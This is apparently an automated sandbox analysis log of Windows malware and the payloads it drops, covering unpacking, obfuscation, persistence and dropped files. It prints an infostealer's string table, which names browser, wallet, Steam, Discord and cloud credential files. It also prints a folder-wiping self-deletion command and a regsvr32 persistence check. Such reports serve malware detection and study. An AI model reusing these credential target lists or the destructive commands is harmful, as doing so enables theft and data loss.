StatefalseAzure\.azureSOFTWARE\monero-project\monero-corechromefile_nameDisplayNameHostNameProductNameUserNameGdipSaveImageToFilemsal.cacheGdipDisposeImagemodeAzure\.IdentityServiceUseMasterPasswordhwidMachineGuidtask_idbuild_idCrash DetectedDisabled%dx%d%d/%d/%d %d:%d:%d.arcvdr1.pdb\Local Storage\leveldb_0.indexeddb.leveldb_formhistory.db_history.db_cookies.db_passwords.db_webdata.db_key4.db\key4.dbfile_dataLogin DataWeb DataoperaOperachrome-extension_[Processes][Software]\storage\default\\.aws\errors\\Telegram Desktop\\Steam\\config\\.azure\ Stable\\.IdentityService\\discord\/c timeout /t 10 & rd /s /q "C:\ProgramData\" & rd /s /q "C:\ProgramData\\..\.ZDISPLAYOpera GXEXCEPTION_INT_OVERFLOWEXCEPTION_FLT_OVERFLOWEXCEPTION_STACK_OVERFLOWEXCEPTION_FLT_UNDERFLOWPOSTEXCEPTION_BREAKPOINT\Local Storage\leveldb\CURRENTEXCEPTION_DATATYPE_MISALIGNMENTEXCEPTION_FLT_INEXACT_RESULTGETEXCEPTION_IN_PAGE_ERRORdQw4w9WgXcQEXCEPTION_SINGLE_STEPGdipCreateBitmapFromHBITMAPEXCEPTION_INT_DIVIDE_BY_ZEROEXCEPTION_FLT_DIVIDE_BY_ZEROEXCEPTION_NONCONTINUABLE_EXCEPTIONUNKNOWN EXCEPTIONEXCEPTION_INVALID_DISPOSITIONEXCEPTION_PRIV_INSTRUCTIONEXCEPTION_ILLEGAL_INSTRUCTIONEXCEPTION_FLT_INVALID_OPERATIONEXCEPTION_ACCESS_VIOLATIONEXCEPTION_FLT_STACK_CHECKEXCEPTION_FLT_DENORMAL_OPERANDEXCEPTION_ARRAY_BOUNDS_EXCEEDED%d MBIndexedDBOCALAPPDATA?<Host><Port><User><Pass encoding="base64">http://localhost:"webSocketDebuggerUrl":6^userContextId=4294967295465 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73ws://localhost:9223.metadata-v2:22.ps15121Windows 11HTTP/1.1HARDWA
Source:	Binary string: cryptosetup.pdbGCTL source: Appeal.com, 00000014.00000002.3672354873.0000000004DA0000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: cryptosetup.pdb source: Appeal.com, 00000014.00000002.3672354873.0000000004DA0000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: 1.pdb\ source: Appeal.com, 00000014.00000003.2709531843.0000000004D39000.00000004.00000800.00020000.00000000.sdmp, Appeal.com, 00000014.00000003.2706766000.0000000004D39000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: BitLockerToGo.pdbGCTL source: c3d996d758.exe, 00000007.00000002.2718587583.0000000009ED0000.00000004.00001000.00020000.00000000.sdmp, a58cbe76b9.exe, 00000020.00000002.3297242480.000000000A080000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: 1.pdb source: Appeal.com, 00000014.00000003.2709531843.0000000004D39000.00000004.00000800.00020000.00000000.sdmp, Appeal.com, 00000014.00000003.2706766000.0000000004D39000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: {"id":1,"method":"Storage.getCookies"}\|.tgz.gzSecurityHistoryWork Dir: In memorySOFTWARE\Microsoft\Cryptographyfirefox%08lX%04lX%lu_key.txtSoft\Steam\steam_tokens.txt\Discord\tokens.txtpasswords.txtinformation.txtlocalhostWebSocketClient" & exitGdipGetImageHeightSoftGdipGetImagePixelFormatN0ZWFt\Monero\wallet.keysAzure\.awsstatusWallets_CreateProcessGdipGetImageEncodershttpsSoftware\Martin Prikryl\WinSCP 2\SessionsPlugins/devtoolsprefs.jsLocal Extension SettingsSync Extension SettingsFilescookiesCookies\BraveWallet\Preferenceskey_datas%s\%s\%sPortNumberCurrentBuildNumberGdiplusStartup.zipGdipCreateHBITMAPFromBitmapOpera Crypto.zooUnknownGdiplusShutdown/json_logins.jsoninvalid string positionSoftware\Martin Prikryl\WinSCP 2\ConfigurationDisplayVersionSOFTWARE\Microsoft\Windows NT\CurrentVersionopentokenamcommunity.comTelegramSoftware\Valve\SteamGdipSaveImageToStreamGdipLoadImageFromStream\AppData\Roaming\FileZilla\recentservers.xml.dllSOFTWARE\Microsoft\Windows\CurrentVersion\Uninstallapprove_aprilNetworkblock.arjprofiles.ini.lzhGdipGetImageWidthwallet_pathSteamPathscreenshot.jpgstring too longvector<T> too longProcessorNameStringloginusers.vdflibraryfolders.vdfconfig.vdfDialogConfig.vdfDialogConfigOverlay*.vdfGdipGetImageEncodersSizesteam.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\cmd.exeC:\Windows\system32\rundll32.exeBravetrueformhistory.sqlitecookies.sqliteplaces.sqliteLocal StatefalseAzure\.azureSOFTWARE\monero-project\monero-corechromefile_nameDisplayNameHostNameProductNameUserNameGdipSaveImageToFilemsal.cacheGdipDisposeImagemodeAzure\.IdentityServiceUseMasterPasswordhwidMachineGuidtask_idbuild_idCrash DetectedDisabled%dx%d%d/%d/%d %d:%d:%d.arcvdr1.pdb\Local Storage\leveldb_0.indexeddb.leveldb_formhistory.db_history.db_cookies.db_passwords.db_webdata.db_key4.db\key4.dbfile_dataLogin DataWeb DataoperaOperachrome-extension_[Processes][Software]\storage\default\\.aws\errors\\Telegram Desktop\\Steam\\config\\.azure\ Stable\\.IdentityService\\discord\/c timeout /t 10 & rd /s /q "C:\ProgramData\" & rd /s /q "C:\ProgramData\\..\.ZDISPLAYOpera GXEXCEPTION_INT_OVERFLOWEXCEPTION_FLT_OVERFLOWEXCEPTION_STACK_OVERFLOWEXCEPTION_FLT_UNDERFLOWPOSTEXCEPTION_BREAKPOINT\Local Storage\leveldb\CURRENTEXCEPTION_DATATYPE_MISALIGNMENTEXCEPTION_FLT_INEXACT_RESULTGETEXCEPTION_IN_PAGE_ERRORdQw4w9WgXcQEXCEPTION_SINGLE_STEPGdipCreateBitmapFromHBITMAPEXCEPTION_INT_DIVIDE_BY_ZEROEXCEPTION_FLT_DIVIDE_BY_ZEROEXCEPTION_NONCONTINUABLE_EXCEPTIONUNKNOWN EXCEPTIONEXCEPTION_INVALID_DISPOSITIONEXCEPTION_PRIV_INSTRUCTIONEXCEPTION_ILLEGAL_INSTRUCTIONEXCEPTION_FLT_INVALID_OPERATIONEXCEPTION_ACCESS_VIOLATIONEXCEPTION_FLT_STACK_CHECKEXCEPTION_FLT_DENORMAL_OPERANDEXCEPTION_ARRAY_BOUNDS_EXCEEDED%d MBIndexedDBOCALAPPDATA?<Host><Port><User><Pass encoding="base64">http://localhost:"webSocketDebuggerUrl":6^userContextId=4294967295465 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73ws://localhost:9223.metadata-v2:22.ps15121Windows 11HTTP/1.1HARDWAR
Source:	Binary string: Excited.pdb source: 2328527160.exe, 00000016.00000000.2236560137.0000000000AC2000.00000002.00000001.01000000.0000000D.sdmp, 2328527160.exe, 00000016.00000002.2569687773.0000000003F19000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: c:\zlib-dll\Release\isunzlib.pdb source: ac911b4662.tmp, 00000026.00000003.2749097896.0000000003260000.00000004.00001000.00020000.00000000.sdmp, ac911b4662.tmp, 00000026.00000003.2752848082.0000000003598000.00000004.00001000.00020000.00000000.sdmp

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\2E02vIiMfd.exe	Unpacked PE file: 0.2.2E02vIiMfd.exe.a20000.0.unpack :EW;.rsrc:W;.idata :W; :EW;lzqzkbgd:EW;fbbrhqkl:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;lzqzkbgd:EW;fbbrhqkl:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Unpacked PE file: 1.2.skotes.exe.610000.0.unpack :EW;.rsrc:W;.idata :W; :EW;lzqzkbgd:EW;fbbrhqkl:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;lzqzkbgd:EW;fbbrhqkl:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Unpacked PE file: 2.2.skotes.exe.610000.0.unpack :EW;.rsrc:W;.idata :W; :EW;lzqzkbgd:EW;fbbrhqkl:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;lzqzkbgd:EW;fbbrhqkl:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Unpacked PE file: 6.2.skotes.exe.610000.0.unpack :EW;.rsrc:W;.idata :W; :EW;lzqzkbgd:EW;fbbrhqkl:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;lzqzkbgd:EW;fbbrhqkl:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1053879001\8a7032211b.exe	Unpacked PE file: 29.2.8a7032211b.exe.410000.0.unpack :EW;.rsrc:W;.idata :W; :EW;nktzncmi:EW;cdauizjx:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;nktzncmi:EW;cdauizjx:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe	Unpacked PE file: 33.2.714ab8b5fd.exe.1a0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;qqtrmnsk:EW;nskkxmzy:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;qqtrmnsk:EW;nskkxmzy:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Cross-platform Player 3.99\crossplatformplayer.exe	Unpacked PE file: 36.2.crossplatformplayer.exe.400000.0.unpack .text:EW;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.vmp0:ER;.rsrc:R;

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\AppData\Local\Cross-platform Player 3.99\crossplatformplayer.exe

Unpacked PE file: 36.2.crossplatformplayer.exe.400000.0.unpack

.NET source code contains method to dynamically call methods (often used by packers)

Source: random[1].exe1.6.dr, WS36uhldRk15BMqR9l.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{QCGNJZTm7XRc6fgjQf0(typeof(IntPtr).TypeHandle),typeof(Type)})
Source: 2328527160.exe.6.dr, WS36uhldRk15BMqR9l.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{QCGNJZTm7XRc6fgjQf0(typeof(IntPtr).TypeHandle),typeof(Type)})
Source: random[3].exe2.6.dr, WS36uhldRk15BMqR9l.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{QCGNJZTm7XRc6fgjQf0(typeof(IntPtr).TypeHandle),typeof(Type)})
Source: 14484258fa.exe.6.dr, WS36uhldRk15BMqR9l.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{QCGNJZTm7XRc6fgjQf0(typeof(IntPtr).TypeHandle),typeof(Type)})

.NET source code contains potential unpacker

Source: random[1].exe1.6.dr, QcapXlsQaOUTcM6d72A.cs	.Net Code: IXR09cJLII
Source: random[1].exe1.6.dr, QcapXlsQaOUTcM6d72A.cs	.Net Code: vK9cjiltfI
Source: 2328527160.exe.6.dr, QcapXlsQaOUTcM6d72A.cs	.Net Code: IXR09cJLII
Source: 2328527160.exe.6.dr, QcapXlsQaOUTcM6d72A.cs	.Net Code: vK9cjiltfI
Source: random[3].exe2.6.dr, QcapXlsQaOUTcM6d72A.cs	.Net Code: IXR09cJLII
Source: random[3].exe2.6.dr, QcapXlsQaOUTcM6d72A.cs	.Net Code: vK9cjiltfI
Source: 14484258fa.exe.6.dr, QcapXlsQaOUTcM6d72A.cs	.Net Code: IXR09cJLII
Source: 14484258fa.exe.6.dr, QcapXlsQaOUTcM6d72A.cs	.Net Code: vK9cjiltfI

Suspicious powershell command line found

Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "if (Get-ScheduledTask \| Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:SYNC C:\Users\user\AppData\Roaming\uxtheme_2.drv' }) { exit 0 } else { exit 1 }"
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "if (Get-ScheduledTask \| Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:SYNC C:\Users\user\AppData\Roaming\uxtheme_2.drv' }) { exit 0 } else { exit 1 }"

Source: random[1].exe1.6.dr

Static PE information: 0xE73D5611 [Mon Dec 8 06:37:05 2092 UTC]

Source: C:\Users\user\AppData\Local\Temp\1053876001\d1d4560504.exe

Code function: 8_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress,

8_2_00406328

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

Source: random[1].exe.6.dr	Static PE information: real checksum: 0xe407d should be: 0xe185c
Source: 2328527160.exe.6.dr	Static PE information: real checksum: 0x42662 should be: 0x90d30
Source: random[3].exe1.6.dr	Static PE information: real checksum: 0x0 should be: 0x16fc42
Source: 8a7032211b.exe.6.dr	Static PE information: real checksum: 0x1d7d43 should be: 0x1e2501
Source: random[3].exe.6.dr	Static PE information: real checksum: 0xdfde2 should be: 0xd54e7
Source: skotes.exe.0.dr	Static PE information: real checksum: 0x1df3a7 should be: 0x1d0efd
Source: random[2].exe2.6.dr	Static PE information: real checksum: 0x0 should be: 0x3886e4
Source: c90cec6187.exe.6.dr	Static PE information: real checksum: 0x0 should be: 0x3886e4
Source: random[1].exe1.6.dr	Static PE information: real checksum: 0x42662 should be: 0x90d30
Source: 14484258fa.exe.6.dr	Static PE information: real checksum: 0x42662 should be: 0x614a4
Source: random[3].exe2.6.dr	Static PE information: real checksum: 0x42662 should be: 0x614a4
Source: d1d4560504.exe.6.dr	Static PE information: real checksum: 0xe407d should be: 0xe185c
Source: random[4].exe.6.dr	Static PE information: real checksum: 0x1e69f0 should be: 0x1ebea5
Source: cf666bd85d.exe.6.dr	Static PE information: real checksum: 0x1e69f0 should be: 0x1ebea5
Source: random[2].exe1.6.dr	Static PE information: real checksum: 0x1db14d should be: 0x1e0071
Source: ac911b4662.exe.6.dr	Static PE information: real checksum: 0x0 should be: 0x16fc42
Source: 2E02vIiMfd.exe	Static PE information: real checksum: 0x1df3a7 should be: 0x1d0efd
Source: fb2bfd0ee0.exe.6.dr	Static PE information: real checksum: 0xdfde2 should be: 0xd54e7
Source: 714ab8b5fd.exe.6.dr	Static PE information: real checksum: 0x1db14d should be: 0x1e0071
Source: random[2].exe.6.dr	Static PE information: real checksum: 0x1d7d43 should be: 0x1e2501

Source: 2E02vIiMfd.exe	Static PE information: section name:
Source: 2E02vIiMfd.exe	Static PE information: section name: .idata
Source: 2E02vIiMfd.exe	Static PE information: section name:
Source: 2E02vIiMfd.exe	Static PE information: section name: lzqzkbgd
Source: 2E02vIiMfd.exe	Static PE information: section name: fbbrhqkl
Source: 2E02vIiMfd.exe	Static PE information: section name: .taggant
Source: skotes.exe.0.dr	Static PE information: section name:
Source: skotes.exe.0.dr	Static PE information: section name: .idata
Source: skotes.exe.0.dr	Static PE information: section name:
Source: skotes.exe.0.dr	Static PE information: section name: lzqzkbgd
Source: skotes.exe.0.dr	Static PE information: section name: fbbrhqkl
Source: skotes.exe.0.dr	Static PE information: section name: .taggant
Source: c3d996d758.exe.6.dr	Static PE information: section name: .symtab
Source: random[1].exe0.6.dr	Static PE information: section name: .symtab
Source: random[3].exe0.6.dr	Static PE information: section name: .didata
Source: 8d05ec9382.exe.6.dr	Static PE information: section name: .didata
Source: random[4].exe.6.dr	Static PE information: section name:
Source: random[4].exe.6.dr	Static PE information: section name: .idata
Source: random[4].exe.6.dr	Static PE information: section name:
Source: random[4].exe.6.dr	Static PE information: section name: ynbkfsqm
Source: random[4].exe.6.dr	Static PE information: section name: lfcakuqz
Source: random[4].exe.6.dr	Static PE information: section name: .taggant
Source: random[1].exe2.6.dr	Static PE information: section name: .textbss
Source: random[1].exe2.6.dr	Static PE information: section name: .msvcjmc
Source: random[1].exe2.6.dr	Static PE information: section name: .fptable
Source: abd4306087.exe.6.dr	Static PE information: section name: .textbss
Source: abd4306087.exe.6.dr	Static PE information: section name: .msvcjmc
Source: abd4306087.exe.6.dr	Static PE information: section name: .fptable
Source: random[2].exe.6.dr	Static PE information: section name:
Source: random[2].exe.6.dr	Static PE information: section name: .idata
Source: random[2].exe.6.dr	Static PE information: section name:
Source: random[2].exe.6.dr	Static PE information: section name: nktzncmi
Source: random[2].exe.6.dr	Static PE information: section name: cdauizjx
Source: random[2].exe.6.dr	Static PE information: section name: .taggant
Source: 8a7032211b.exe.6.dr	Static PE information: section name:
Source: 8a7032211b.exe.6.dr	Static PE information: section name: .idata
Source: 8a7032211b.exe.6.dr	Static PE information: section name:
Source: 8a7032211b.exe.6.dr	Static PE information: section name: nktzncmi
Source: 8a7032211b.exe.6.dr	Static PE information: section name: cdauizjx
Source: 8a7032211b.exe.6.dr	Static PE information: section name: .taggant
Source: cf666bd85d.exe.6.dr	Static PE information: section name:
Source: cf666bd85d.exe.6.dr	Static PE information: section name: .idata
Source: cf666bd85d.exe.6.dr	Static PE information: section name:
Source: cf666bd85d.exe.6.dr	Static PE information: section name: ynbkfsqm
Source: cf666bd85d.exe.6.dr	Static PE information: section name: lfcakuqz
Source: cf666bd85d.exe.6.dr	Static PE information: section name: .taggant
Source: random[2].exe0.6.dr	Static PE information: section name: .symtab
Source: a58cbe76b9.exe.6.dr	Static PE information: section name: .symtab
Source: random[2].exe1.6.dr	Static PE information: section name:
Source: random[2].exe1.6.dr	Static PE information: section name: .idata
Source: random[2].exe1.6.dr	Static PE information: section name:
Source: random[2].exe1.6.dr	Static PE information: section name: qqtrmnsk
Source: random[2].exe1.6.dr	Static PE information: section name: nskkxmzy
Source: random[2].exe1.6.dr	Static PE information: section name: .taggant
Source: 714ab8b5fd.exe.6.dr	Static PE information: section name:
Source: 714ab8b5fd.exe.6.dr	Static PE information: section name: .idata
Source: 714ab8b5fd.exe.6.dr	Static PE information: section name:
Source: 714ab8b5fd.exe.6.dr	Static PE information: section name: qqtrmnsk
Source: 714ab8b5fd.exe.6.dr	Static PE information: section name: nskkxmzy
Source: 714ab8b5fd.exe.6.dr	Static PE information: section name: .taggant

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 6_2_0062D91C push ecx; ret	6_2_0062D92F
Source: C:\Users\user\AppData\Local\Temp\567757\Appeal.com	Code function: 20_2_004602D8 push cs; retn 0045h	20_2_00460318
Source: C:\Users\user\AppData\Local\Temp\567757\Appeal.com	Code function: 20_2_00430DE6 push ecx; ret	20_2_00430DF9
Source: C:\Users\user\AppData\Local\Temp\567757\Appeal.com	Code function: 20_2_0042DC7C push AA0046CFh; iretd	20_2_0042DC87
Source: C:\Users\user\AppData\Local\Temp\1053877001\2328527160.exe	Code function: 22_2_01577BA6 push ecx; ret	22_2_01577BB2

Source: 2E02vIiMfd.exe	Static PE information: section name: entropy: 7.974798247650506
Source: 2E02vIiMfd.exe	Static PE information: section name: lzqzkbgd entropy: 7.952540615284537
Source: skotes.exe.0.dr	Static PE information: section name: entropy: 7.974798247650506
Source: skotes.exe.0.dr	Static PE information: section name: lzqzkbgd entropy: 7.952540615284537
Source: random[4].exe.6.dr	Static PE information: section name: ynbkfsqm entropy: 7.946501356412279
Source: random[2].exe.6.dr	Static PE information: section name: entropy: 7.983359512406003
Source: random[2].exe.6.dr	Static PE information: section name: nktzncmi entropy: 7.953370293472151
Source: 8a7032211b.exe.6.dr	Static PE information: section name: entropy: 7.983359512406003
Source: 8a7032211b.exe.6.dr	Static PE information: section name: nktzncmi entropy: 7.953370293472151
Source: cf666bd85d.exe.6.dr	Static PE information: section name: ynbkfsqm entropy: 7.946501356412279
Source: random[2].exe1.6.dr	Static PE information: section name: entropy: 7.984381680379524
Source: random[2].exe1.6.dr	Static PE information: section name: qqtrmnsk entropy: 7.953843925231993
Source: 714ab8b5fd.exe.6.dr	Static PE information: section name: entropy: 7.984381680379524
Source: 714ab8b5fd.exe.6.dr	Static PE information: section name: qqtrmnsk entropy: 7.953843925231993

Source: random[1].exe1.6.dr, SX7VHXsUw02CIOBEHMt.cs	High entropy of concatenated method names: 'yPnsD4TnOx', 'dXusyMG1aA', 'o3ismIfVR8', 'kP1sEIhXrK', 'mqfska4Qvx', 'C36sotIQsQ', 'rRasPCPoK8', 'sBqs8LZ6Rt', 'nPqs79L3Nh', 'FFrsbQX4xG'
Source: random[1].exe1.6.dr, QcapXlsQaOUTcM6d72A.cs	High entropy of concatenated method names: 'XxeM7tarU5', 'vinMbvFplH', 'cViMQb2cJK', 'u9uMv6dVWb', 'MLbMViHlSa', 'FomMifG1RJ', 'LtkMA23hmd', 'bxaXX4VaGP', 'qg9MSmYjxU', 'quVMBikCSy'
Source: random[1].exe1.6.dr, T4D7CLsdBY5USblHXPJ.cs	High entropy of concatenated method names: 'G7d1a0Fg4E', 'QW8QRVdM9XhwD4KOpJ0', 'peIfPNdNCG1d3DZTxSe', 'tTJfgtdukweQE8CgfnF', 'cM23bAdxoF512v5GYph', 'MWmxkkdc2ljstBYdFqI'
Source: random[1].exe1.6.dr, WS36uhldRk15BMqR9l.cs	High entropy of concatenated method names: 'WafGmnTa34nDiqJLIUu', 'sNkakTTqkS3CcudO9wQ', 'tWmg2rjfPX', 'rQ7XTBTG9J2qD190dlr', 'fHWlxHTOrZ80BKuh86A', 'WiRsW5T4Jm2UFiKVXmh', 'Y3sBLUTtw3jwZSiZsYl', 'nW4lBacjpc', 'BRLsfrdFc8', 'tHFsgjAiBB'
Source: 2328527160.exe.6.dr, SX7VHXsUw02CIOBEHMt.cs	High entropy of concatenated method names: 'yPnsD4TnOx', 'dXusyMG1aA', 'o3ismIfVR8', 'kP1sEIhXrK', 'mqfska4Qvx', 'C36sotIQsQ', 'rRasPCPoK8', 'sBqs8LZ6Rt', 'nPqs79L3Nh', 'FFrsbQX4xG'
Source: 2328527160.exe.6.dr, QcapXlsQaOUTcM6d72A.cs	High entropy of concatenated method names: 'XxeM7tarU5', 'vinMbvFplH', 'cViMQb2cJK', 'u9uMv6dVWb', 'MLbMViHlSa', 'FomMifG1RJ', 'LtkMA23hmd', 'bxaXX4VaGP', 'qg9MSmYjxU', 'quVMBikCSy'
Source: 2328527160.exe.6.dr, T4D7CLsdBY5USblHXPJ.cs	High entropy of concatenated method names: 'G7d1a0Fg4E', 'QW8QRVdM9XhwD4KOpJ0', 'peIfPNdNCG1d3DZTxSe', 'tTJfgtdukweQE8CgfnF', 'cM23bAdxoF512v5GYph', 'MWmxkkdc2ljstBYdFqI'
Source: 2328527160.exe.6.dr, WS36uhldRk15BMqR9l.cs	High entropy of concatenated method names: 'WafGmnTa34nDiqJLIUu', 'sNkakTTqkS3CcudO9wQ', 'tWmg2rjfPX', 'rQ7XTBTG9J2qD190dlr', 'fHWlxHTOrZ80BKuh86A', 'WiRsW5T4Jm2UFiKVXmh', 'Y3sBLUTtw3jwZSiZsYl', 'nW4lBacjpc', 'BRLsfrdFc8', 'tHFsgjAiBB'
Source: random[3].exe2.6.dr, SX7VHXsUw02CIOBEHMt.cs	High entropy of concatenated method names: 'yPnsD4TnOx', 'dXusyMG1aA', 'o3ismIfVR8', 'kP1sEIhXrK', 'mqfska4Qvx', 'C36sotIQsQ', 'rRasPCPoK8', 'sBqs8LZ6Rt', 'nPqs79L3Nh', 'FFrsbQX4xG'
Source: random[3].exe2.6.dr, QcapXlsQaOUTcM6d72A.cs	High entropy of concatenated method names: 'XxeM7tarU5', 'vinMbvFplH', 'cViMQb2cJK', 'u9uMv6dVWb', 'MLbMViHlSa', 'FomMifG1RJ', 'LtkMA23hmd', 'bxaXX4VaGP', 'qg9MSmYjxU', 'quVMBikCSy'
Source: random[3].exe2.6.dr, T4D7CLsdBY5USblHXPJ.cs	High entropy of concatenated method names: 'G7d1a0Fg4E', 'QW8QRVdM9XhwD4KOpJ0', 'peIfPNdNCG1d3DZTxSe', 'tTJfgtdukweQE8CgfnF', 'cM23bAdxoF512v5GYph', 'MWmxkkdc2ljstBYdFqI'
Source: random[3].exe2.6.dr, WS36uhldRk15BMqR9l.cs	High entropy of concatenated method names: 'WafGmnTa34nDiqJLIUu', 'sNkakTTqkS3CcudO9wQ', 'tWmg2rjfPX', 'rQ7XTBTG9J2qD190dlr', 'fHWlxHTOrZ80BKuh86A', 'WiRsW5T4Jm2UFiKVXmh', 'Y3sBLUTtw3jwZSiZsYl', 'nW4lBacjpc', 'BRLsfrdFc8', 'tHFsgjAiBB'
Source: 14484258fa.exe.6.dr, SX7VHXsUw02CIOBEHMt.cs	High entropy of concatenated method names: 'yPnsD4TnOx', 'dXusyMG1aA', 'o3ismIfVR8', 'kP1sEIhXrK', 'mqfska4Qvx', 'C36sotIQsQ', 'rRasPCPoK8', 'sBqs8LZ6Rt', 'nPqs79L3Nh', 'FFrsbQX4xG'
Source: 14484258fa.exe.6.dr, QcapXlsQaOUTcM6d72A.cs	High entropy of concatenated method names: 'XxeM7tarU5', 'vinMbvFplH', 'cViMQb2cJK', 'u9uMv6dVWb', 'MLbMViHlSa', 'FomMifG1RJ', 'LtkMA23hmd', 'bxaXX4VaGP', 'qg9MSmYjxU', 'quVMBikCSy'
Source: 14484258fa.exe.6.dr, T4D7CLsdBY5USblHXPJ.cs	High entropy of concatenated method names: 'G7d1a0Fg4E', 'QW8QRVdM9XhwD4KOpJ0', 'peIfPNdNCG1d3DZTxSe', 'tTJfgtdukweQE8CgfnF', 'cM23bAdxoF512v5GYph', 'MWmxkkdc2ljstBYdFqI'
Source: 14484258fa.exe.6.dr, WS36uhldRk15BMqR9l.cs	High entropy of concatenated method names: 'WafGmnTa34nDiqJLIUu', 'sNkakTTqkS3CcudO9wQ', 'tWmg2rjfPX', 'rQ7XTBTG9J2qD190dlr', 'fHWlxHTOrZ80BKuh86A', 'WiRsW5T4Jm2UFiKVXmh', 'Y3sBLUTtw3jwZSiZsYl', 'nW4lBacjpc', 'BRLsfrdFc8', 'tHFsgjAiBB'

Persistence and Installation Behavior

Drops PE files with a suspicious file extension

Source: C:\Windows\SysWOW64\cmd.exe

File created: C:\Users\user\AppData\Local\Temp\567757\Appeal.com

Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1053876001\d1d4560504.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-GBSQT.tmp\c90cec6187.tmp	File created: C:\Users\user\AppData\Local\Cross-platform Player 3.99\uninstall\is-M557G.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-ADPLF.tmp\ac911b4662.tmp	File created: C:\Users\user\AppData\Roaming\is-5UJKF.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-GBSQT.tmp\c90cec6187.tmp	File created: C:\Users\user\AppData\Local\Cross-platform Player 3.99\is-6A03S.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1053880001\a58cbe76b9.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1053882001\c90cec6187.exe	File created: C:\Users\user\AppData\Local\Temp\is-GBSQT.tmp\c90cec6187.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-GBSQT.tmp\c90cec6187.tmp	File created: C:\Users\user\AppData\Local\Cross-platform Player 3.99\Qt5PrintSupport.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[2].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-ADPLF.tmp\ac911b4662.tmp	File created: C:\Users\user\AppData\Local\Temp\is-USEQS.tmp\_isetup\_shfoldr.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-GBSQT.tmp\c90cec6187.tmp	File created: C:\Users\user\AppData\Local\Cross-platform Player 3.99\is-708D0.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-GBSQT.tmp\c90cec6187.tmp	File created: C:\Users\user\AppData\Local\Temp\is-IV43K.tmp\_isetup\_shfoldr.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1053883001\ac911b4662.exe	File created: C:\Users\user\AppData\Local\Temp\is-PAS4F.tmp\ac911b4662.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-ADPLF.tmp\ac911b4662.tmp	File created: C:\Users\user\AppData\Local\unins000.exe (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1053885001\fb2bfd0ee0.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-ADPLF.tmp\ac911b4662.tmp	File created: C:\Users\user\AppData\Local\is-3MHQO.tmp	Jump to dropped file
Source: C:\Windows\System32\regsvr32.exe	File created: C:\Users\user\AppData\Local\dllhost.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[3].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-GBSQT.tmp\c90cec6187.tmp	File created: C:\Users\user\AppData\Local\Cross-platform Player 3.99\msvcr100.dll (copy)	Jump to dropped file
